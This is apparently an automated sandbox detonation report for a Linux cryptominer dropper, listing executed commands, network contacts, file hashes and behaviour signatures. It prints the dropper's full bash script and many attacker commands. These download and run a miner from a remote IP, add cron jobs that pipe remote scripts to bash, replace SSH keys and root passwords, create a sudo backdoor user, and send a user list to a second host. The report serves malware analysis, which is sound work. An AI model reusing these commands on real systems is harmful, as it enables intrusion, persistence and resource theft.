/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/bin/mv

[mv /var/lib/update-notifier/tmp.yslDS5CLWR /var/lib/update-notifier/updates-available]

/usr/bin/chmod

[chmod +r /var/lib/update-notifier/updates-available]

/usr/bin/rm

[rm -f /var/lib/update-notifier/tmp.yslDS5CLWR]

/usr/bin/tr

[tr \n ]

/usr/bin/cut

[cut -d: -f1]

/usr/bin/grep

[grep /bin/bash\|/bin/sh\|/zsh\|/fish]

/usr/bin/cat

[cat /etc/passwd]

/usr/bin/chmod

[chmod +x /var/tmp/.xrx/uninstall.sh]

/var/tmp/.xrx/uninstall.sh

[/var/tmp/.xrx/uninstall.sh 2]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/uninstall.sh]

/usr/bin/crontab

[crontab -r]

/usr/bin/chattr

[chattr -ia /etc/crontab]

/usr/bin/rm

[rm -rf /etc/crontab]

/usr/bin/touch

[touch /etc/crontab]

/usr/bin/pkill

[pkill -9 xri]

/usr/bin/pkill

[pkill -9 xrx]

/usr/bin/pkill

[pkill -STOP xxi]

/usr/bin/pkill

[pkill -STOP xmu]

/usr/bin/pkill

[pkill -STOP dhcpi]

/usr/bin/chattr

[chattr -i /usr/lib/updated 2]

/usr/bin/chattr

[chattr -a /usr/lib/updated 2]

/usr/bin/rm

[rm -rf /usr/lib/updated]

/tmp/xrx/init.sh

[./init.sh]

/usr/bin/chattr

[chattr -i /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr -a /root/.ssh/authorized_keys]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys2]

/usr/bin/cp

[cp key /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr +ia /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr -ia /etc/shadow]

/usr/bin/chattr

[chattr -ia /etc/passwd]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ root]

/usr/sbin/nscd

[nscd -i passwd]

/usr/sbin/nscd

[nscd -i group]

/usr/sbin/sss_cache

[sss_cache -UG]

/usr/sbin/nscd

[nscd -i passwd]

/usr/sbin/nscd

[nscd -i group]

/usr/sbin/sss_cache

[sss_cache -UG]

/usr/bin/crontab

[crontab -u root -r]

/usr/bin/sudo

[sudo -u root sh -c echo $HOME]

/usr/bin/sh

[sh -c echo $HOME]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys]

/usr/bin/cp

[cp /var/tmp/.xrx/key /root/.ssh/authorized_keys]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ user]

/usr/sbin/nscd

[nscd -i passwd]

/usr/sbin/nscd

[nscd -i group]

/usr/sbin/sss_cache

[sss_cache -UG]

/usr/sbin/nscd

[nscd -i passwd]

/usr/sbin/nscd

[nscd -i group]

/usr/sbin/sss_cache

[sss_cache -UG]

/usr/bin/crontab

[crontab -u user -r]

/usr/bin/sudo

[sudo -u user sh -c echo $HOME]

/usr/bin/sh

[sh -c echo $HOME]

/usr/bin/rm

[rm -rf /home/user/.ssh/authorized_keys]

/usr/bin/cp

[cp /var/tmp/.xrx/key /home/user/.ssh/authorized_keys]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ root]

/usr/sbin/nscd

[nscd -i passwd]

/usr/sbin/nscd

[nscd -i group]

/usr/sbin/sss_cache

[sss_cache -UG]

/usr/sbin/nscd

[nscd -i passwd]

/usr/sbin/nscd

[nscd -i group]

/usr/sbin/sss_cache

[sss_cache -UG]

/usr/bin/chattr

[chattr -iae /bin/passwd]

/usr/bin/chattr

[chattr -iae /usr/bin/passwd]

/usr/bin/mv

[mv /bin/passwd /bin/passwd.orig]

/usr/bin/mv

[mv /usr/bin/passwd /usr/bin/passwd.orig]

/usr/bin/curl

[curl -sO http://185.252.178.82:6972/passwd]

/usr/bin/wget

[wget -q http://185.252.178.82:6972/passwd]

/usr/bin/chmod

[chmod 4755 /bin/passwd]

/usr/bin/chmod

[chmod u+s /bin/passwd]

/usr/bin/cp

[cp /bin/passwd /usr/bin/passwd]

/usr/bin/curl

[curl -sO http://185.252.178.82:6972/pam_tms]

/usr/bin/wget

[wget -q http://185.252.178.82:6972/pam_tms]

/usr/bin/chmod

[chmod +x /sbin/pam_tms]

/usr/bin/grep

[grep -q pam_tms /etc/pam.d/common-auth]

/usr/sbin/useradd

[useradd cheeki]

/usr/sbin/nscd

[nscd -i passwd]

/usr/sbin/nscd

[nscd -i group]

/usr/sbin/sss_cache

[sss_cache -UG]

/usr/sbin/nscd

[nscd -i passwd]

/usr/sbin/nscd

[nscd -i group]

/usr/sbin/sss_cache

[sss_cache -UG]

/usr/sbin/usermod

[usermod -aG sudo cheeki]

/usr/sbin/nscd

[nscd -i passwd]

/usr/sbin/nscd

[nscd -i group]

/usr/sbin/sss_cache

[sss_cache -UG]

/usr/sbin/nscd

[nscd -i passwd]

/usr/sbin/nscd

[nscd -i group]

/usr/sbin/sss_cache

[sss_cache -UG]

/usr/sbin/usermod

[usermod -aG wheel cheeki]

/usr/sbin/usermod

[usermod -p $6$vrC8Hya.mmeUeIem$Li01KI3RQUpyYepjXUhHF23fTle/wXqAoR0xUFo697faBvmsuXJBTMMK89vGf1YHzhztRGGsNbA/eTIIRXy5Y/ cheeki]

/usr/sbin/nscd

[nscd -i passwd]

/usr/sbin/nscd

[nscd -i group]

/usr/sbin/sss_cache

[sss_cache -UG]

/usr/sbin/nscd

[nscd -i passwd]

/usr/sbin/nscd

[nscd -i group]

/usr/sbin/sss_cache

[sss_cache -UG]

/usr/bin/mv

[mv /var/tmp/.xrx/key /home/cheeki/.ssh/authorized_keys]

/usr/bin/mkdir

[mkdir /var/tmp/.x]

/usr/bin/mv

[mv /var/tmp/.xrx/secure /var/tmp/.x/secure]

/usr/bin/chmod

[chmod +x /var/tmp/.x/secure]

/var/tmp/.x/secure

[/var/tmp/.x/secure]

/usr/bin/base64

[base64]

/usr/bin/tr

[tr \n ]

/usr/bin/cut

[cut -d: -f1]

/usr/bin/grep

[grep /bin/bash\|/bin/sh\|/zsh\|/fish]

/usr/bin/cat

[cat /etc/passwd]

/usr/bin/curl

[curl -s http://179.43.154.189:1010/users?userlist=cm9vdCB1c2VyIGNoZWVraSA=]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 _http._tcp.se.archive.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
SE 194.71.11.163:80 se.archive.ubuntu.com tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
CH 179.43.154.189:1010 tcp

Files

/var/cache/apt/archives/partial/msr-tools_1.3-4_amd64.deb

MD5 e28b5a75d1616a43c64c4c6575f66cdc
SHA1 08301116f9570ebce9a5daad04116d248b4e2fad
SHA256 09a27b6e9acaea64b039dfc20d93114c4b968baf899f7dfc764607efea863986
SHA512 655c8abcfe5c3a4e9fa6f9a35b4bfd8cfa6a3d93f1bd5e169ef3193cb5ea92467cc6e9fbc23fe0809d6223858f335ccab4f6b38ce3c4df8651bc87a62f41dd5c

/var/log/apt/eipp.log.xz

MD5 cdf7555ac28a0c36aba1e3ff1e381f94
SHA1 b60cb5aec5a93830c7336979053bd2cc7102df6d
SHA256 64335031b96a38f4154b49de259777f8226734d6f4b064b77a0551f16efce274
SHA512 bc1701bffb01a31fcbd0cce21eadf43ef80b0ee90cf8251636a04d7b6968593575c8f1132c419be818528fc2c18650990c5800308916c78ba334114df74fb7c5

/var/lib/dpkg/updates/tmp.i

MD5 cee328ac0a2780f6e18a6df6e6891cda
SHA1 aaed4f8bc2ee9d05d14ccf4882513d4c23f92ab2
SHA256 b9bf88055a0096d2acdb702317fdb417394a2b650c89a7238e03eb5d4bfd6d9f
SHA512 6c2e65eddf29a5c5aa9d860285666e5584de20d10951638ae5ac5233c5b39e659adc1db92cc081953ce64f06cfacd93ccdbd6d1531bd8da38e9549bf2ffed9e7

/var/lib/dpkg/tmp.ci/control

MD5 d55f250f60b4e9a0fbd78ff7cdbd9606
SHA1 9771d0932d4f7b3a635fb35a723d2d85b3d9eb49
SHA256 8358bb7f2da0e21a05d5cc2b1a747ba60a1296061c2bbeecd90dc9aeec9ea0f3
SHA512 670a9e38167a4529ef916b6c6827f0badb60a329dd9cdd8d2fe99e0c008e670f8f0c56b6aca34c745f67ff8b56f787064ee48fb52607244031b4b7447d9a46d7

/var/lib/dpkg/tmp.ci/md5sums

MD5 68fabacdc3155c3365664ba770fa5fae
SHA1 5c0d745040fa51759317b8557c8e1e44c39667ae
SHA256 053449dfc437b483162c304156a0dd88f42615a8e434256407d13a6b889bb1bd
SHA512 445729051dbc60678fb984f5460972c99b9eded95d1cd3ab2ff47c7002139b50b9a934fc8f69bf3cd25c6b8add25572d092fbfea481ab63c33f822e24d73f52c

/var/lib/dpkg/updates/tmp.i

MD5 9eff99bb465f3c182968d25837b1db26
SHA1 db104c7098d6404ea0423fe6c2ee719e8909dbb2
SHA256 8fb9ce68dafc5a31c4ad13db7080a180fe7f0ae8df163bc725514a11dac576a6
SHA512 7faedca2dccce1f30e39b7301a255064f610496138f234e70d086bdc6ce981ce4617c3371c7395b091d71ad82bdc754d65c623f85dd8b0f94f779b92d79b28c0

/var/lib/dpkg/updates/tmp.i

MD5 1a4d72a8c987b513ede27054dc3989d4
SHA1 ce402e89a6529560cf1eeb9b1ed4b9245a025eec
SHA256 e5443963228a4557e08c23540ebc73ae13d1fda07bc9971984b9267622c4ff97
SHA512 386dd121aa694ddd3e423f75169e97f7ae2faffa00375af09c1040f36a62bb7cc416627176b0779fd279e47764d8c1b7fd150505758131df0b3dc3d7a01d0be4

/var/lib/dpkg/updates/tmp.i

MD5 05e8860042eda59949e08127ae1d85a9
SHA1 b51abc2a1f3a4d30cb610b39979bdf8186924d89
SHA256 949563c9c05ecb391ccf31618ceb5e2583be297c1e7ac6c77245a84c56b38462
SHA512 0f4f26a3ecc82d9d05a275957178672ae3d156de984ed8ac5412fcd7903912e5c45a08c6eca65a22ce8996091ac9ba1a47677e4fb3718672e4c5c94b297c965f

/var/lib/dpkg/updates/tmp.i

MD5 edae9b7299f2afc09258160786a4dada
SHA1 dd7aa0c8aa29e937efd88b9eb39811e1460b62b9
SHA256 cf7d2275d2effcc231f426e078582b9665c4a2407e267c9e25546220308dd569
SHA512 0e3341d862dde54e87b2cea0384cc79a4594f7a22a322d501fbb386559511cc8e6046bf134bc1496d04bddb80c8213dd0438368d3a5d20b82099a5a4c9cc30ff

/var/lib/dpkg/status-new

MD5 50273ba4ce0efd68b1d4b84be31f24fe
SHA1 3b2d7e1e8834c84d99e1907d6d5efae3e4c7fefc
SHA256 c65f46b29af2cd4a849a4e968d7c38102c7a117e5bf563cc90c4a4fb6033a5b8
SHA512 5c00f87fba0639414ea933d0650c2e95e6d06b464a5f7ac20395e8d92b92fdf88460a33876526447e8d224eb2ee4d13999799002db508e54a4ded67086ea6337

/var/cache/man/1608

MD5 37106c0ca44953e5d7da743c5293634f
SHA1 8466df9e62da69995aaf6706af447e41c34b8010
SHA256 3e9b6f702bb7b5bef6331b69b9a4de18bfe8f7d006808213a72e0911a04fc507
SHA512 e01226df669f3eee9f60acea93c70adb27a3442477e54157eb3182464a7be5323ddf943766e2370ef9e9138172373ae1781c87483685428bd4548f59249b3555

/var/lib/dpkg/status-new

MD5 ba297b58af776ade0e8f90130f83a404
SHA1 36a5a92456bcadd6151e462eef6ffa482bbb3c47
SHA256 f805e030a5e25ea381317c43e6d4d975cb026c62fed061c1528296b88dac24a3
SHA512 ef44f476c7a317619e1cafc2cfa0ab3b7dff6fe99a32297c4331b18ec06a25168db1687218c2a48ba75f0d1f79cb58ca1f11f5db2a5573bc71d02d6c391bb21e

/var/lib/update-notifier/tmp.yslDS5CLWR

MD5 e8800b26db4f6d77b97d8e69814b1448
SHA1 ed2ea2110cc9bd19772a4e83f2d65a9d2bb2d01a
SHA256 4e63f9b0dbaef1130599ff9e04d44bf9fe1a3c858dcdd20e5581467d93dad1d7
SHA512 103718e67e0287f6582bbf2375e5c8c35da8be67b00634e305a796d0ddde6f012ecaf12eed7192739d821000ddc101bcaf341c223620e9dbc8c0dc8b3be6dcdd

/root/.ssh/authorized_keys

MD5 ccd9cd77d2eb605e072a608b23bed991
SHA1 95a5b3a753122370cb429c8c1ad346a5dac04560
SHA256 7030c0f2c017d2e433965bf1112ea402ff36d852af1c2969261fc2b66d94183d
SHA512 9676f9b7bec2f916921f99e46885f326a1374fb20715582dbdd87942ab5b9dfde5e78a96c62b14108c9229717e40a7dce880c787f9ff79ab42a4e9fd209cea62

/etc/passwd+

MD5 a457803380f9fc302a9a520f258ebf19
SHA1 264a387ce526d9ba3d0a98a4beb91d12a9618979
SHA256 eab5884c5bda06a680f52dc9f6f89d55e34288ad16e7eea3450b4a761e45e200
SHA512 8a715be71963b84fac3099a751462b7850896368250fd318fe6112d2fc0816ba356f03e2de47860a1013bffa1b784b116718985a8e4fc173a795b57ea0cb037f

/etc/shadow+

MD5 efc001e6b612f04cd054e03ed0c13c56
SHA1 7fc7deba0b8f0f7cd8e7ec448be75df29a4370b6
SHA256 65a1829fe3e3e87eb9bf478bf3bbfb2935a3400f80eebf7f20ace7d5a714c67c
SHA512 679f4c0e86053a0e4572cd4efa5fbfb6257b7e16c74b7944f3eba96de0cf858bb1c96ae40ecfe780749e9648c4fbdd66ad46ac4ef94d31f917c7df8877383f87

/etc/shadow+

MD5 3fc6946a23dbf6e9f9139b6753f49675
SHA1 8c18fd8e6373a8608e11ff344bddc4d4a08d57e6
SHA256 15535d59908877400f28351138502236cd69bdc549f3bfaa571b8466f5a0f09e
SHA512 a5a5b647a9ab1d2de51e2615d8ef8f45ac26466e0821b83ebf778843fbe82bde008b3495e55a5f29a519cf29d39299d582c1b17ac4748300f43ea3eb425a0c8a

/etc/passwd+

MD5 2f945a2cdd2ca12f3f4609bed6d9a485
SHA1 a481542d3274ef8294970c30c3a87b1fc0133693
SHA256 c9fbf28326e7a932a4ca48b88d0ffe34988a24538ada078644ae5d507517cf74
SHA512 38c5ee6c12bc2ea92055193b1195ed7e8d596c42aa8d24e1f09882bb17c461de2bb90b91e41e4d68a9d783cd121522a1c193249f7f773f00cfb41ccfc6615166

/etc/shadow+

MD5 78f716b93f86d3667a8eb71ff28d7b5f
SHA1 ee9ab2f0158c925ffdc03f902e01cee771af45a3
SHA256 1d0bfe94f705cb94fb5c85f29ead19d5e43bf50f48ab6ad98eaf90caf9f3ad47
SHA512 c72f8bbb12987caf02a3b83f9cdac8cbe754945abbfea8015da726ffecc19643feebd61aed02d60471001b64c9e7632789a28ff91c4104456c597048c342e939

/etc/group+

MD5 d03b5979ec8defb1af1bc71358652dd1
SHA1 8ff2cc9e62a6088e5fc7f4de65bfaba544516506
SHA256 e981539a6ffad87728939695d11af7e189d14c12cac6260007b09b31fe73e4ac
SHA512 35dee53b0e7506677e599bb9d283c343f1cf73cd54232036f899c790029742f4afcf2f6b512dddcc6a536267bb5afbd90ea2510abf601d8e517bf7d9ba4e2f83

/etc/gshadow+

MD5 74bb71b330e3cd401560262989d1511b
SHA1 35fe9e21468d4a9cf7fc541cfd5c8fe094bb5b2a
SHA256 905e4fa1d5bd580d82d33a19460825a7f1b7330adb66a1fdb18c15bf583b0d3f
SHA512 c07a64cf0e0e269aea806d03c15461a06819b39d261211ada4b8ac88d534d68cc657047c3e9350ba6dd41646d8aba2a00421b78df58c99858852e146b275f9be

/etc/subuid+

MD5 4641942396624780f617210b1c564db9
SHA1 5f87f6066aed9fdc0cc1a907a397ba383731ac57
SHA256 6ed2c35ec029779fb7f08108345965c99c171908cd125934943dfc6c9a17d32e
SHA512 dccd0d158d875f145746c5efa7b1e87f458d4f1d1b91391958cb6e669ad2f8060c49bef46d79af62b521b02c4d10e8e4e50b4245bed539284eed580b3e3d23ca

/etc/group+

MD5 894591694f7465f19653eeda668be1d6
SHA1 fc9f4fb301197ba4edab27d67b4fea7739f7bf57
SHA256 8156f1dddc131fcc721f545c81d0ab9a173ea3eed70db77e361b2cf1383201c7
SHA512 9c89159378a596174badeb434c12d88ab48aa4334182e1ad206b1078d73a4e8b0dae097c2f684e9122b56dfb8c52c81fa800b8f7ded1504f1f79ae04d92db457

/etc/gshadow+

MD5 a465908053898956a8f5b18502573bfa
SHA1 cc5c7ba2c6ceab7983b7bf142e44c30e4e9772a9
SHA256 0204b46756d06221d81ac7327716279394282679155ef5eb558cc876cfda352c
SHA512 ceced51bb75a9cbf8092447166266a07c4ec61e8dc68dd2a47c9fbc5b0c0af2419e4d222422101a07bbc8e8bb8fcc8c6b64ae68cfea2bf80946371ec42137af9

/etc/shadow+

MD5 f418767e8e15178fa3a3611b86c730cc
SHA1 ffe9b1ebbcd0b4b113deb1a8a1c2fbb8db323da3
SHA256 8b17501911ad37b49e269ec466694e11ae5d0a4072dcc534510cec04cef0d180
SHA512 b9bb29c46369dc88f776ddbdd5de2ae1002f3aeb583010cbe135140a78718ea34d9cb9a2427c4ac7fcb812e9029b0c948c960d5f8351bf3d5360c5b7a4e56c2d

Analysis: behavioral25

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

ubuntu2004-amd64-20240508-en

Max time kernel

19s

Max time network

134s

Command Line

[/tmp/xrx/secure]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/bash N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /etc/crontab /bin/bash N/A

Enumerates running processes

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/pgrep N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pgrep N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/641/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/17/status /usr/bin/pgrep N/A
File opened for reading /proc/1003/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1348/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/74/status /usr/bin/pgrep N/A
File opened for reading /proc/1095/status /usr/bin/pgrep N/A
File opened for reading /proc/1149/status /usr/bin/pgrep N/A
File opened for reading /proc/1083/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/457/status /usr/bin/pgrep N/A
File opened for reading /proc/491/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1038/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1405/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/670/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/sys/kernel/osrelease /usr/bin/pgrep N/A
File opened for reading /proc/166/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/170/status /usr/bin/pgrep N/A
File opened for reading /proc/986/status /usr/bin/pgrep N/A
File opened for reading /proc/1102/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1028/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1080/status /usr/bin/pgrep N/A
File opened for reading /proc/3/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/174/status /usr/bin/pgrep N/A
File opened for reading /proc/1130/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/19/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/458/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1130/status /usr/bin/pgrep N/A
File opened for reading /proc/7/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/74/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/954/status /usr/bin/pgrep N/A
File opened for reading /proc/1033/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/803/status /usr/bin/pgrep N/A
File opened for reading /proc/2/status /usr/bin/pgrep N/A
File opened for reading /proc/986/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1094/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/118/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/806/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1091/status /usr/bin/pgrep N/A
File opened for reading /proc/1/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/140/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/84/status /usr/bin/pgrep N/A
File opened for reading /proc/443/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/696/status /usr/bin/pgrep N/A
File opened for reading /proc/764/status /usr/bin/pgrep N/A
File opened for reading /proc/676/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1083/status /usr/bin/pgrep N/A
File opened for reading /proc/996/status /usr/bin/pgrep N/A
File opened for reading /proc/23/status /usr/bin/pgrep N/A
File opened for reading /proc/996/status /usr/bin/pgrep N/A
File opened for reading /proc/1078/status /usr/bin/pgrep N/A
File opened for reading /proc/91/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/443/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/173/status /usr/bin/pgrep N/A
File opened for reading /proc/271/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/803/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/617/status /usr/bin/pgrep N/A
File opened for reading /proc/140/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1050/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/17/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/486/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/491/status /usr/bin/pgrep N/A
File opened for reading /proc/1033/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1091/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/90/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1095/cmdline /usr/bin/pgrep N/A

Processes

/tmp/xrx/secure

[/tmp/xrx/secure]

/bin/bash

[/tmp/xrx/secure -c exec '/tmp/xrx/secure' "$@" /tmp/xrx/secure]

/tmp/xrx/secure

[/tmp/xrx/secure]

/bin/bash

[/tmp/xrx/secure -c #!/bin/bash ifrunning=$(pgrep xrx) ######################## ######################## downloadminer(){ link1="http://185.252.178.82:6972/xrx/xrx" link2="http://185.252.178.82:6972/configs/config-xrx.json" mkdir /var/tmp/.xrx cd /var/tmp/.xrx/ chattr -ia /var/tmp/.xrx/xrx chattr -ia /var/tmp/.xrx/config.json rm -rf /var/tmp/.xrx/xrx rm -rf /var/tmp/.xrx/config.json curl -L -O $link1 || cd1 -L -O $link1 || wget $link1 --no-check-certificate curl -L -O $link2 || cd1 -L -O $link2 || wget $link2 --no-check-certificate mv config-xrx.json config.json chmod +x /var/tmp/.xrx/xrx } ######################## ######################## crontablegend(){ if (( $EUID != 0 )); then if ! crontab -l | grep -q 'secure'; then cd /dev/shm rm -rf /dev/shm/.spark echo "@daily /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark sleep 1 echo "@reboot /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark sleep 1 echo "1 * * * * /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark sleep 1 echo "*/30 * * * * curl 185.252.178.82:1011/next | bash " >> .spark sleep 1 echo "*/30 * * * * curl load.whitesnake.church:1011/next | bash " >> .spark sleep 1 crontab .spark sleep 2 rm -rf /dev/shm/.spark fi fi if (( $EUID == 0 )); then if ! cat /etc/crontab | grep -q 'secure'; then echo "@daily root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab echo "@reboot root /var/tmp/.xrx/init.sh hide >/dev/null 2>&1 & disown $* " >> /etc/crontab echo "1 * * * * root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab echo "*/30 * * * * root curl 185.252.178.82:1011/next | bash " >> /etc/crontab echo "*/30 * * * * root curl load.whitesnake.church:1011/next | bash " >> /etc/crontab fi fi } ######################## ######################## gettingmineru(){ fsiz=`ls -l /var/tmp/.xrx/xrx | awk '{print $5}'` if [ -f /var/tmp/.xrx/xrx ]; then echo "miner intact" else echo "miner not found,downloading..." downloadminer fi if [[ "$fsiz" -gt 0 ]]; then echo "miner size intact" else echo "filesize 0,downloading..." downloadminer fi } ######################## ######################## gettingmineru crontablegend if test -z "$ifrunning" ; then echo "xrx not running,starting..." /var/tmp/.xrx/xrx </dev/null &>/dev/null & disown -h %1 sleep 1 echo -e "pid:" pgrep xrx fi /tmp/xrx/secure]

/usr/bin/pgrep

[pgrep xrx]

/usr/bin/awk

[awk {print $5}]

/usr/bin/ls

[ls -l /var/tmp/.xrx/xrx]

/usr/bin/mkdir

[mkdir /var/tmp/.xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/config.json]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/xrx]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/config.json]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/xrx/xrx]

/usr/bin/wget

[wget http://185.252.178.82:6972/xrx/xrx --no-check-certificate]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/configs/config-xrx.json]

